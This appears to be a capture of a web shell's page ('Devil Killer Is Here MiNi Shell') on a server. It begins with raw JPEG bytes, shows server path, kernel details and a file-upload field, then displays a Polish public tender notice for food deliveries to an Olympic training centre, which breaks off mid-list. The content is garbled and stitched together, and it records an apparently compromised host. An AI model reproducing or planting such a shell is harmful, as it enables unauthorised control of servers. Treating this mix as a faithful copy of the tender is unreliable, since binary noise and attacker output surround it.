JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230328/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230328/0015371201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy artykułów spożywczych różnych - 5 części do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Centralny Ośrodek Sportu z siedzibą w Warszawie, (00-449), ul. Łazienkowska 6A, Ośrodek Przygotowań Olimpijskich we Władysławowie (84-120) ul. Żeromskiego 52</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 14273335600035</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żeromskiego 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Władysławowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">84-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL634 - Gdański</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi.wladyslawowo@cos.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.cos.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - instytucja gospodarki budżetowej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> sport </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy artykułów spożywczych różnych - 5 części do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5dddf206-cd44-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00153712</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00005041/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.5 Sukcesywne dostawy artykułów spożywczych różnych do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5dddf206-cd44-11ed-b70f-ae2d9e28ec7b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>7. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>8. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>9. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki.<br/>10. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. – nie dotyczy niniejszego postepowania<br/>11. Informacje, oświadczenia lub dokumenty , inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a. w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b. jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>12. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2020 r. poz. 1913 oraz z 2021 r. poz. 1655) wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>13. Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>	administratorem Pani/Pana danych osobowych jest Centralny Ośrodek Sportu, ul. Łazienkowska 6a, 00-449 Warszawa. <br/>	Dane kontaktowe do Inspektora Ochrony Danych: iod@cos.pl, tel. 513790306 ;<br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na ”Sukcesywne dostawy artykułów spożywczych różnych - 5 części do Ośrodka Przygotowań Olimpijskich we Władysławowie wraz z usługą transportu” odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz.U. z 2022 r. poz. 1710 z późn. zm.), dalej „ustawa Pzp”; <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">14/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I - Dżemy, bakalie, keczup, musztarda i podobne<br/>Lp.	Nazwa oraz opis wymaganych cech danego asortymentu (kryteria stosowane w celu oceny równoważności)	jm	ilość<br/>1.	2.	3.	4.<br/>1. CHRZAN TARTY - Skład: chrzan, cukier, ocet, skrobia, sól, kwasek cytrynowy, przeciwutleniacze, Charakteryzuje się śnieżno białym kolorem. waga surowca netto w opakowaniu jednostkowym max 900 g typu Rolnik,Frutico lub produkt równowazny..Cenę należy podać w odniesieniu do wagi netto wskazanej na opakowaniu	kg	30<br/>2. Daktyle suszone bez pestek-owoce niezniszczone podczas usuwania pestek,smak słodki,bez posmaków zgorzknienia fermentacji,barwa od bursztynowej do ciemnobrązowej,bez obecności szkodników oraz ich pozostałości--opakowanie max 0.50 kg netto,typu Bakalland lub produkt równoważny	kg	60<br/>3. DŻEM np. truskawka, wiśnia, czarna porzeczka- wysokosłodzone-gat.I,/zawartość owoców min.35%/-opak słoik lub wiaderko, produkt o wadze jednostkowej netto max 1 kg typu Łowicz,Agrovita,STOVIT lub produkt równoważny-należy podać cenę netto surowca za 1 kg kg	280<br/>4. imbir mielony - opakowanie od 500g-1kg	kg	1<br/>5. JABŁKA PRAŻONE typu &#34;SZARLOTKA&#34; gat.I-produkt otrzymany z wysokiej jakości jabłek,pokrojonych w kostkę zanurzonych w słodko-kwaśnej zalewie-zawartość owoców min 80%- waga surowca netto w opakowaniu jednostkowym (bez odcieku) w szklanym opakowaniu max 1 kg-należy podać cenę netto surowca za 1 kg po odcieku typu Ronik,Prospana,Bakalland lub produkt równoważny	kg	220<br/>6. Kardamon mielony - opakowanie 20g- 60g	kg	0,5<br/>7. KETCHUP łagodny,pikantny - pomidory co najmniej 145 g na 100 g ketchupu,cukier,sól, ekstraty przypraw<br/>opakowanie butelka plastikowa waga netto max 1kg.<br/>Cenę należy podać w odniesieniu do wagi netto wskazanej na opakowaniu typu Heinz,Włocławek,Roleski lub produkt równoważny	kg	40<br/>8. KETCHUP porcjowany saszetka Skład Pomidory (min 120 g na 100 g ketchupu), ocet, cukier, sól,<br/>naturalne aromaty przypraw (m.in. seler), przyprawy. - opakowanie waga netto minimum 10 g np. firmy Fanex,Heinz,develey lub produkt równoważny.<br/>Cenę należy podać w odniesieniu do wagi netto wskazanej na opakowaniu.	szt	20000<br/>9. Konfitura różne smaki opak netto max 500 g-należy podać cenę netto w odniesieniu do 1 kg samego surowca typu Stovit ,KIER lub produkt równoważny	kg	80<br/>10. Majonez -saszetki-skład:olej roślinny min.70%,woda,ocet,żółtko jaj,cukier,sól,gorczyca -opakowanie waga minimum 10 gr.Cenę należy podać w odniesieniu do wagi netto wskazanej na opakowaniu-typu Heinz,Fanex lub produkt równoważny	szt	8000<br/>11. Mango suszone-skład: mango suszone co najmniej 85%, cukier-max.10%, regulatory kwasowości,substancja konserwująca:opakowanie max 100 g typu Bakalland lub produkt równoważny	kg	15<br/>12. MIGDAŁY PŁATKI - gatunek I, jednolitego jasnoberzowego koloru, płatki nie połamane. pakowane max 0,50 kg,typu Japar lub produkt równoważny	kg	25<br/>13. Migdały pokrojone w słupki -opakowanie max 0,25 kg typu Kresto lub produkt równoważny	kg	3<br/>14. MIÓD PSZCZELI NATURALNY WIELOKWIATOWY lejący- gatunek I, opakowanie max 1 kg-należy podać cenę netto za 1 kg w odniesieniu do wagi netto wskazanej na opakowaniu	kg	550<br/>15. MORELE SUSZONE bez pestek - Gatunek I,opakowanie max 0.50 kg,typu Bakalland, Kresto lub produkt równoważny	kg	50<br/>16. Musztarda Francuska - z całymi ziarnami gorczcy opakowanie - waga netto max 500g typu Kamis lub produkt równoważny	kg	15<br/>17. MUSZTARDA porcjowana - opakowanie saszetka waga netto w opakowaniu minimum 10 gr, np. firmy develey, Roleski,Heinz lub produkt równoważny<br/>Cenę należy podać w odniesieniu do wagi netto wskazanej na opakowaniu.	szt	6500<br/>18. MUSZTARDA SAREPSKA - umiarkowanie ostra o tradycyjnym smaku, gęstej konsystencji i stonowanej barwie z widocznymi ciemnymi kawałeczkami gorczycy,firmy Dawtona,Frutico lub produkt równoważny waga netto produktu w opak max. 1 kg.Cenę należy podać w odniesieniu do wagi netto wskazanej na opakowaniu.	kg	100<br/>19. Nasiona chia-czarno biała barwa z lekkim połyskiem -waga netto produktu w opak max 200 g	kg	2<br/>20. OCET 10% spirytusowy - opakowanie butelka szklana lub plastikowa o pojemności max 0,5 litr typu Rolnik Lub produkt równoważny	l	140<br/>21. Ocet Balsamiczny- but. szklana a&#39; 500ml max,typu HELCOM lub produkt równoważny	l	5<br/>22. Ocet WINNY - garunek I czerwony butelka o pojemności max 1 l	l	5<br/>23. OCET WINNY - gatunek I biały,opak.butelka o pojemności max 1l	l	5<br/>24. ORZECH WŁOSKI ŁUSKANY - gatunek I, jasnobrązowe połówki typu Bakalland,Helcom lub produkt równoważny, - opakownia min 100 g max 0.50 kg	kg	100<br/>25. Pestki dyni Gatunek I, łuskane,opakowanie max 0.50 kg,typu Japar lub produkt równoważny	kg	20<br/>26. RODZYNKI SUŁTAŃSKIE - gatunek I, charakteyzują się brązowym, ciemnobursztynowym kolorem, intensywnym i słodkim zapachem, pierwszej jakości, sprężyste i miękkie . opakowane max 500 gr,typu Bakalland,Helcom lub produkt równoważny	kg	100<br/>27. SEZAM ZIARNO - waga netto produktu w opak max 0.50 kg	kg	15<br/>28. SYROP MALINOWY,malinowy z jeżyną- butelka max do 1l typu Herbapol, CYMES lub produkt równoważny	l	15<br/>29. ŚLIWKA KALIFORNIJSKA drylowana- Gatunek I, skład: śliwki suszone bez pestek,substancja konserwująca -sorbinian potasu. o mięsistej strukturze, nie wysuszona, opakowanie waga netto max 0.50 kg,typu Bakallnad lub produkt równoważny	kg	60<br/>30. TABASCO BRAND Peper Sauce-opakowanie butelka szklana o pojemności max 60 ml lub produkt równoważny	szt	30<br/>31. Wiórki kokosowe - opak, waga produktu netto max 0.25kg	kg	10<br/>32. Ziarno słonecznika - opakowanie max 0,50 kg.	kg	25<br/>33. Żurawina do mięsa - opakowanie słoik szklany waga wsadu max 0.5 kg -typu ŁOWICZ lub produkt równoważny-należy podać cenę netto za 1 kg w odniesieniu do wagi netto wskazanej na opakowaniu	kg	10<br/>34. Żurawina suszona opak min 500 gr max 1 kg,typu Bakalland,Japar lub produkt równoważny	kg	35 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15831600-8 - Miód</p> <p class="mb-0">15871110-8 - Ocet lub produkty równoważne</p> <p class="mb-0">15871230-5 - Ketchup</p> <p class="mb-0">15871250-1 - Musztarda</p> <p class="mb-0">15871273-8 - Majonez</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowy</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II - Mąka, cukier, płatki i inne artykuły suche<br/>Lp.	Nazwa oraz opis wymaganych cech danego asortymentu (kryteria stosowane w celu oceny równoważności)	jm	ilość<br/>1.	2.	3.	4.<br/>1. BUDYŃ- śmietankowy, waniliowy, czekoladowy, powinien charakteryzować się dobrą rozpuszczalnością w wodzie, nie powinien podchodzić wodą po przyrządzeniu, po zagotowniu powinien mieć wyrazisty smak, kolor i gęstą konsystencję nie zawierającą grudek. Zużycie 110-120g proszku/1 litr mleka. Opakowanie max1,50 kg firmy Winiary lub produkt równoważny.	kg	15<br/>2. CUKIER BIAŁY KRYSZTAŁ - opakowanie max 1kg,,typu Polski Cukier,Diamant lub produkt równoważny	kg	630<br/>3. Cukier brązowy trzcinowy - opakowanie 1 kg,typu Helcom lub produkt równoważny	kg	3<br/>4. CUKIER PUDER - bez zbryleń, opakowanie woreczek foliowy szczelnie zamknięty, opakowaniea - 0,50kg max,typu Diamant lub produkt równoważny	kg	40<br/>5. CUKIER WANILIOWY-przyrządzany jest z cukru buraczanego łączonego z laskami wanilii lub ekstraktem wanilii-waga netto produktu w opak max 35 g,typu Delecta lub produkt równoważny	kg	30<br/>6. GALARETKA OWOCOWA (Ananas, truskawka, wiśnia, pomarańcza, cytryna)- powinna charakteryzować się dobrą rozpuszczalnością w wodzie, nie powinna podchodzić wodą po przyrządzeniu, po zagotowniu powinna mieć wyrazisty smak, kolor i odpowiednio gęstą konsystencję, nie zawierającą grudek, Zużycie 150-160 g proszku/1 l wody, opakowanie max 1.50 kg firmy Winiary lub produkt równoważny kg	15<br/>7. Kakao naturalne zawartość tłuszczu kakaowego min 10% -max 12%, opak .max 100 g typu Celiko,Wawel lub produkt równoważny	kg	1<br/>8. KASZA GRYCZANA - cała, prażona opakowanie 1 kg i max 5kg,typu ESCA lub produkt równoważny	kg	350<br/>9. Kasza jaglana - opakowanie max 2 kg	kg	70<br/>10. KASZA JĘCZMIENNA -drobna opakowanie max. 2 kg	kg	50<br/>11. KASZA KUS-KUS - gatunek I, opakowanie max 1 kg,typu Gabo lub produkt równoważny	kg	50<br/>12. Kasza manna - opak,max 1 kg,typu KUPIEC lub produkt równoważny	kg	20<br/>13. KASZA pęczak - opakowanie max 2 kg	kg	180<br/>14. KISIEL OWOCOWY -powinien charakteryzować się dobrą rozpuszczalnością w wodzie, nie powinien podchodzić wodą po przyrządzeniu, po zagotowniu powinien mieć wyrazisty smak, kolor i odpowiednio gęstą konsystencję nie zawierającą grudek. zużycie 150-160g proszku/1 l wody, opakowanie max a&#39;1,50 kg firmy Winiary lub produkt równoważny kg	15<br/>15. MĄKA pszenna typ 450-480 - mąka wysokogatunkowa, mocno zmielona, przesiana,opakowanie max1kg typu Polskie Młyny Mąka Szymanowska lub produkt równoważny	kg	1200<br/>16. 